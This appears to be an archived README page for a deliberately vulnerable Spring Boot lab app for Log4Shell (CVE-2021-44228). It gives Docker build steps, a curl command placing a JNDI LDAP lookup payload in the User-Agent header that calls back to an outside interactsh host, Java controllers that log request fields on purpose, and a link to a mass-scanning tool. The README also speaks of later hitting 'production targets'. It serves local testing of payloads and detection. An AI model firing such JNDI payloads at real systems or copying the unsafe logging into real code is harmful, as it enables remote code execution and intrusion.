关联漏洞
介绍
# CVE-2021-44228 Vuln App
[](https://github.com/ahmad4fifz/CVE-2021-44228-vuln-app/actions/workflows/build.yml)
This is a dirty hack spring boot hello world proejct to test your tooling/payloads/detection capabilities locally before you hit production targets with them.
The configured Log4j version is 2.13.0
## Building the docker image
```bash
docker build . -t vulnerable-app
docker run -p 8080:8080 --name vulnerable-app vulnerable-app
```
## Testing / Triggering CVE-2021-44228
If you don't have burp collaborator running in the garage, you can visit this site to get a similar experience: https://interactsh.com
```bash
curl -s --max-time 20 localhost:8080 -H 'User-Agent: ${jndi:ldap://<some_custom_identifier>.<your_generated_subdomain>.interactsh.com/a}' > /dev/null
```
### Scanner tool
Optionall you can use this awesome repo for performing local/mass scanning: https://github.com/adilsoybali/Log4j-RCE-Scanner
### Trigger locations
This vulnerability is all about forcing a user controlled value to be logged by the vulnerable logging framework. With this in mind this simple dummy application supports two HTTP (GET/PUT) verbs and a bunch of injection locations:
```java
@GetMapping("/")
public String index(HttpServletRequest request) {
logger.info("Request URL: " + request.getRequestURL());
logger.info("Request URI: " + request.getRequestURI());
logger.info("Request Method: " + request.getMethod());
logger.info("Request Query String: " + request.getQueryString());
logger.info("Request Protocol: " + request.getProtocol());
logger.info("Request Remote Address: " + request.getRemoteAddr());
logger.info("Request Remote Host: " + request.getRemoteHost());
logger.info("Request Remote Port: " + request.getRemotePort());
logger.info("Request User Agent: " + request.getHeader("User-Agent"));
return "Log4J2 is working!";
}
```
```java
@PostMapping("/")
public String post(HttpServletRequest request, @RequestBody String body) {
logger.info("Request URL: " + request.getRequestURL());
logger.info("Request URI: " + request.getRequestURI());
logger.info("Request Method: " + request.getMethod());
logger.info("Request Query String: " + request.getQueryString());
logger.info("Request Protocol: " + request.getProtocol());
logger.info("Request Remote Address: " + request.getRemoteAddr());
logger.info("Request Remote Host: " + request.getRemoteHost());
logger.info("Request Remote Port: " + request.getRemotePort());
logger.info("Request User Agent: " + request.getHeader("User-Agent"));
logger.info("Request Body: " + body); // mind the extra request body
return "Log4J2 is working!";
}
```
Contribution / improvements are welcome.
Sorry for code quality :) this project is not for showoff but to share/help.
文件快照
[4.0K] /data/pocs/9fc4d2d092e39da3fb9497c72d6a3e2c5e68c1d7
├── [4.0K] app
│ ├── [ 722] build.gradle
│ ├── [4.0K] gradle
│ │ └── [4.0K] wrapper
│ │ ├── [ 54K] gradle-wrapper.jar
│ │ └── [ 200] gradle-wrapper.properties
│ ├── [5.8K] gradlew
│ ├── [2.8K] gradlew.bat
│ ├── [ 998] log4j.xml
│ ├── [9.7K] mvnw
│ ├── [6.2K] mvnw.cmd
│ ├── [1.5K] pom.xml
│ ├── [ 33] settings.gradle
│ └── [4.0K] src
│ ├── [4.0K] main
│ │ ├── [4.0K] java
│ │ │ └── [4.0K] com
│ │ │ └── [4.0K] example
│ │ │ └── [4.0K] springboot
│ │ │ ├── [ 829] Application.java
│ │ │ └── [1.9K] HelloController.java
│ │ └── [4.0K] resources
│ │ └── [ 53] application.properties
│ └── [4.0K] test
│ └── [4.0K] java
│ └── [4.0K] com
│ └── [4.0K] example
│ └── [4.0K] springboot
│ ├── [ 746] HelloControllerIT.java
│ └── [1017] HelloControllerTest.java
├── [ 76] Dockerfile
├── [1.0K] LICENSE
└── [2.8K] README.md
15 directories, 18 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。